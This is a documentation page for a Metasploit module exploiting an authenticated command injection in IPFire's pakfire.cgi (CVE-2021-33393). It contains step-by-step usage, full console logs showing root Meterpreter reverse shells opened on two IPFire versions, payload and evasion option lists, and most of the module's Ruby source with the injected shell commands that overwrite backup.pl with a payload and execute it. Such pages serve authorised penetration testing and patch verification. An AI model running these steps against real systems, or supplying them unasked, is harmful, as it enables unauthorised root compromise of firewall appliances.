IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE - Metasploit


This page contains detailed information about how to use the exploit/linux/http/ipfire_pakfire_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
Module: exploit/linux/http/ipfire_pakfire_exec
Source code: modules/exploits/linux/http/ipfire_pakfire_exec.rb
Disclosure date: 2021-05-17
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): python
Supported platform(s): Python
Target service / protocol: http, https
Target network port(s): 80, 443, 444, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-33393

This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • config-changes: Module modifies some configuration setting on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use exploit/linux/http/ipfire_pakfire_exec
msf exploit(ipfire_pakfire_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


IPFire 2.25 (Core Update 156) IPFire 2.21 (Core Update 126)

This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.

Verification Steps


  1. Start msfconsole
  2. Do: use exploit/linux/http/ipfire_pakfire_exec
  3. Do: set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS>
  4. Do: set password <PASSWORD FOR admin USER ON THE WEB PORTAL>
  5. Do: set rhost <TARGET IP>
  6. Do: set lhost <YOUR IP>
  7. Do: exploit
  8. You should get a shell as the root user.

Options


USERNAME Username of the administrative user you are authenticating to the web portal as.

PASSWORD Password for the administrative user you are authenticating to the web portal as.

Scenarios


IPFire 2.21 (Core Update 126)

msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                        chine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
RHOSTS => 172.29.202.191
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Backing up backup.pl to /tmp/1TiE8...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.191
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 28379 created.
Channel 1 created.
sh: cannot set terminal process group (27956): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.3#

IPFire 2.25 (Core Update 156)

msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                        chine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
RHOST => 172.29.202.157
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Backing up backup.pl to /tmp/8Yndo...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.157
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 10179 created.
Channel 1 created.
sh: cannot set terminal process group (10136): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.0#

Go back to menu.

Msfconsole Usage


Here is how the linux/http/ipfire_pakfire_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/ipfire_pakfire_exec

[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show info

       Name: IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
     Module: exploit/linux/http/ipfire_pakfire_exec
   Platform: Python
       Arch: python
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-05-17

Provided by:
  M��cahit Saratar <[email protected]>
  Grant Willcox

Module side effects:
 config-changes
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Python Dropper

Check supported:
  Yes

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   yes       Password to login with
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     444              yes       The target port (TCP)
  SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT   8080             yes       The local port to listen on.
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                    no        The URI to use for this exploit (default is random)
  USERNAME  admin            yes       User to login with
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authenticated command injection 
  vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices 
  running versions 2.25 Core Update 156 and prior to execute arbitrary 
  code as the root user.

References:
  https://www.exploit-db.com/exploits/49869
  https://nvd.nist.gov/vuln/detail/CVE-2021-33393
  https://github.com/MucahitSaratar/ipfire-2-25-auth-rce
  https://www.youtube.com/watch?v=5FUXV7dfNjg

Module Options


This is a complete list of options available in the linux/http/ipfire_pakfire_exec exploit:

msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python Dropper

Advanced Options


Here is a complete list of advanced options supported by the linux/http/ipfire_pakfire_exec exploit:

msf6 exploit(linux/http/ipfire_pakfire_exec) > show advanced

Module advanced options (exploit/linux/http/ipfire_pakfire_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_i
                                                                                         nvokewebrequest)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PythonMeterpreterDebug       false            no        Enable debugging for the Python meterpreter
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/ipfire_pakfire_exec module can exploit:

msf6 exploit(linux/http/ipfire_pakfire_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/ipfire_pakfire_exec exploit:

msf6 exploit(linux/http/ipfire_pakfire_exec) > show payloads

Compatible Payloads
===================

   #   Name                                         Disclosure Date  Rank    Check  Description
   -   ----                                         ---------------  ----    -----  -----------
   0   payload/generic/custom                                        normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                             normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                        normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/python/meterpreter/bind_tcp                           normal  No     Python Meterpreter, Python Bind TCP Stager
   6   payload/python/meterpreter/bind_tcp_uuid                      normal  No     Python Meterpreter, Python Bind TCP Stager with UUID Support
   7   payload/python/meterpreter/reverse_http                       normal  No     Python Meterpreter, Python Reverse HTTP Stager
   8   payload/python/meterpreter/reverse_https                      normal  No     Python Meterpreter, Python Reverse HTTPS Stager
   9   payload/python/meterpreter/reverse_tcp                        normal  No     Python Meterpreter, Python Reverse TCP Stager
   10  payload/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Meterpreter, Python Reverse TCP SSL Stager
   11  payload/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Meterpreter, Python Reverse TCP Stager with UUID Support
   12  payload/python/meterpreter_bind_tcp                           normal  No     Python Meterpreter Shell, Bind TCP Inline
   13  payload/python/meterpreter_reverse_http                       normal  No     Python Meterpreter Shell, Reverse HTTP Inline
   14  payload/python/meterpreter_reverse_https                      normal  No     Python Meterpreter Shell, Reverse HTTPS Inline
   15  payload/python/meterpreter_reverse_tcp                        normal  No     Python Meterpreter Shell, Reverse TCP Inline
   16  payload/python/pingback_bind_tcp                              normal  No     Python Pingback, Bind TCP (via python)
   17  payload/python/pingback_reverse_tcp                           normal  No     Python Pingback, Reverse TCP (via python)
   18  payload/python/shell_bind_tcp                                 normal  No     Command Shell, Bind TCP (via python)
   19  payload/python/shell_reverse_tcp                              normal  No     Command Shell, Reverse TCP (via python)
   20  payload/python/shell_reverse_tcp_ssl                          normal  No     Command Shell, Reverse TCP SSL (via python)
   21  payload/python/shell_reverse_udp                              normal  No     Command Shell, Reverse UDP (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/ipfire_pakfire_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/ipfire_pakfire_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No response from the target!


Here is a relevant code snippet related to the "No response from the target!" error message:

100:	  end
101:	
102:	  def check
103:	    cevap = send_packet('GET', '', 10)
104:	    if cevap.nil? || cevap.body.empty?
105:	      return CheckCode::Unknown('No response from the target!')
106:	    end
107:	
108:	    unless cevap.body.scan(/401 Unauthorized/).empty?
109:	      return CheckCode::Unknown('Invalid credentials supplied! Check USERNAME and PASSWORD options!')
110:	    end

Invalid credentials supplied! Check USERNAME and PASSWORD options!


Here is a relevant code snippet related to the "Invalid credentials supplied! Check USERNAME and PASSWORD options!" error message:

104:	    if cevap.nil? || cevap.body.empty?
105:	      return CheckCode::Unknown('No response from the target!')
106:	    end
107:	
108:	    unless cevap.body.scan(/401 Unauthorized/).empty?
109:	      return CheckCode::Unknown('Invalid credentials supplied! Check USERNAME and PASSWORD options!')
110:	    end
111:	
112:	    version = cevap.body.scan(/IPFire (.*) \(.*\) - Core Update [0-9]{3}/).flatten[0] || ''
113:	    core = cevap.body.scan(/IPFire .* \(.*\) - Core Update (.*)/).flatten[0] || ''
114:	    unless version

Target is not IPFire


Here is a relevant code snippet related to the "Target is not IPFire" error message:

110:	    end
111:	
112:	    version = cevap.body.scan(/IPFire (.*) \(.*\) - Core Update [0-9]{3}/).flatten[0] || ''
113:	    core = cevap.body.scan(/IPFire .* \(.*\) - Core Update (.*)/).flatten[0] || ''
114:	    unless version
115:	      return CheckCode::Safe('Target is not IPFire')
116:	    end
117:	    if core.to_i >= 157
118:	      return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")
119:	    end
120:	

Target is running IPFire <VERSION> (Core Update <CORE>)


Here is a relevant code snippet related to the "Target is running IPFire <VERSION> (Core Update <CORE>)" error message:

113:	    core = cevap.body.scan(/IPFire .* \(.*\) - Core Update (.*)/).flatten[0] || ''
114:	    unless version
115:	      return CheckCode::Safe('Target is not IPFire')
116:	    end
117:	    if core.to_i >= 157
118:	      return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")
119:	    end
120:	
121:	    CheckCode::Appears("Target is running IPFire #{version} (Core Update #{core})")
122:	  end
123:	

Target is running IPFire <VERSION> (Core Update <CORE>)


Here is a relevant code snippet related to the "Target is running IPFire <VERSION> (Core Update <CORE>)" error message:

116:	    end
117:	    if core.to_i >= 157
118:	      return CheckCode::Safe("Target is running IPFire #{version} (Core Update #{core})")
119:	    end
120:	
121:	    CheckCode::Appears("Target is running IPFire #{version} (Core Update #{core})")
122:	  end
123:	
124:	  def exploit
125:	    temp_backup_file = Rex::Text.rand_text_alphanumeric(5, 30)
126:	    print_status("Backing up backup.pl to /tmp/#{temp_backup_file}...")

<PEER> disconnected whilst trying to back up backup.pl!


Here is a relevant code snippet related to the "<PEER> disconnected whilst trying to back up backup.pl!" error message:

123:	
124:	  def exploit
125:	    temp_backup_file = Rex::Text.rand_text_alphanumeric(5, 30)
126:	    print_status("Backing up backup.pl to /tmp/#{temp_backup_file}...")
127:	    if send_packet('POST', "cp /var/ipfire/backup/bin/backup.pl /tmp/#{temp_backup_file}", 1).nil?
128:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to back up backup.pl!")
129:	    end
130:	
131:	    print_status('Overwriting the contents of backup.pl with a Python header statement')
132:	    if send_packet('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1).nil?
133:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")

<PEER> disconnected whilst trying to overwrite backup.pl!


Here is a relevant code snippet related to the "<PEER> disconnected whilst trying to overwrite backup.pl!" error message:

128:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to back up backup.pl!")
129:	    end
130:	
131:	    print_status('Overwriting the contents of backup.pl with a Python header statement')
132:	    if send_packet('POST', 'echo "#!/usr/bin/python" > /var/ipfire/backup/bin/backup.pl', 1).nil?
133:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")
134:	    end
135:	
136:	    print_status('Appending the contents of backup.pl with the Python code to be executed.')
137:	    if send_packet('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1).nil?
138:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")

<PEER> disconnected whilst trying to append to backup.pl!


Here is a relevant code snippet related to the "<PEER> disconnected whilst trying to append to backup.pl!" error message:

133:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to overwrite backup.pl!")
134:	    end
135:	
136:	    print_status('Appending the contents of backup.pl with the Python code to be executed.')
137:	    if send_packet('POST', "echo \"#{payload.encoded}\" >> /var/ipfire/backup/bin/backup.pl", 1).nil?
138:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")
139:	    end
140:	
141:	    print_status('Executing /usr/local/bin/backupctrl to run the payload')
142:	    unless send_packet('POST', '/usr/local/bin/backupctrl', 1).nil?
143:	      fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')

Something went wrong, the server should not respond after we execute the payload.


Here is a relevant code snippet related to the "Something went wrong, the server should not respond after we execute the payload." error message:

138:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to append to backup.pl!")
139:	    end
140:	
141:	    print_status('Executing /usr/local/bin/backupctrl to run the payload')
142:	    unless send_packet('POST', '/usr/local/bin/backupctrl', 1).nil?
143:	      fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')
144:	    end
145:	
146:	    print_good('You should now have your shell, restoring the original contents of the backup.pl file...')
147:	    if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?
148:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")

<PEER> disconnected whilst trying to restore backup.pl!


Here is a relevant code snippet related to the "<PEER> disconnected whilst trying to restore backup.pl!" error message:

143:	      fail_with(Failure::UnexpectedReply, 'Something went wrong, the server should not respond after we execute the payload.')
144:	    end
145:	
146:	    print_good('You should now have your shell, restoring the original contents of the backup.pl file...')
147:	    if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?
148:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")
149:	    end
150:	
151:	    print_status('All done, enjoy the shells!')
152:	  rescue ::Rex::ConnectionError
153:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

145:	
146:	    print_good('You should now have your shell, restoring the original contents of the backup.pl file...')
147:	    if send_packet('POST', "cp /tmp/#{temp_backup_file} /var/ipfire/backup/bin/backup.pl", 20).nil?
148:	      fail_with(Failure::Unreachable, "#{peer} disconnected whilst trying to restore backup.pl!")
149:	    end
150:	
151:	    print_status('All done, enjoy the shells!')
152:	  rescue ::Rex::ConnectionError
153:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
154:	  end
155:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.